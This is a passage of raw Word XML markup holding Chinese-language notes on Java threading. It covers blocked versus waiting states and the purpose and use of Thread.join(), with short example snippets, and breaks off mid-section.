          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002227C6" w:rsidRPr="002227C6" w:rsidRDefault="002227C6" w:rsidP="002227C6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是虚拟机认为程序还不能进入某个区域，因为同时进去就会有问题，这是一块临界区。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002227C6" w:rsidRDefault="002227C6" w:rsidP="002227C6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="357" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、发生</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等操作的先决条件是要进入临界区，也就是线程已经拿到锁了，自己可能进去做了一些事情，但此时通过判定业务上的参数，发现还有一些其他配合的资源没有准备充分，那么自己就等等再做其他事情。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F96FAE" w:rsidRPr="005947AC" w:rsidRDefault="00F96FAE" w:rsidP="002227C6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="357" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3556510"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="266" name="图片 9" descr="https://segmentfault.com/img/bVvat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segmentfault.com/img/bVvati"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3556510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12489" w:rsidRPr="00C12489" w:rsidRDefault="00C12489" w:rsidP="00AA20F8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00197F56" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程常用的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00F41A4C" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法作用</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一、在研究</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的用法之前，先明确两件事情。</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1.join</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法定义在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>类中，则调用者必须是一个线程，</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例如：</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Thread t = new CustomThread();//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这里一般是自定义的线程类</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t.start();//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程起动</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t.join();//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>此处会抛出</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>异常</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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>上面的两行代码也是在一个线程里面执行的。</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以上出现了两个线程，一个是我们自定义的线程类，我们实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法，做一些我们需要的工作；另外一个线程，生成我们自定义线程类的对象，然后执行</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customThread.start();</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customThread.join();</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在这种情况下，两个线程的关系是一个线程由另外一个线程生成并起动，所以我们暂且认为第一个线程叫做</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>子线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，另外一个线程叫做</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>主线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</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lastRenderedPageBreak/>
        <w:t>二、为什么要用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>join()</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="005E7AB1" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E7AB1">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>主线程生成并起动了子线程，而子线程里要进行大量的耗时的运算</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7AB1">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7AB1">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这里可以借鉴下线程的作用</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7AB1">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7AB1">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，当主线程处理完其他的事务后，需要用到子线程的处理结果，这个时候就要用到</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7AB1">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>join();</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7AB1">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法了。</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三、</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法的作用</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在网上看到有人说</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>将两个线程合并</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。这样解释我觉得理解起来还更麻烦。不如就借鉴下</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>里的说法：</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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>等待该线程终止。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</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解释一下，是主线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>我在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>里已经命名过了</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>等待子线程的终止。也就是在子线程调用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>join()</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法后面的代码，只有等到子线程结束了才能执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(Waits for this thread to die.)</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四、用实例来理解</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写一个简单的例子来看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>join()</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的用法，一共三个类：</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 xml:space="preserve">1.CustomThread </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>类</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2. CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>类</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 xml:space="preserve">3. JoinTestDemo </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>类，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
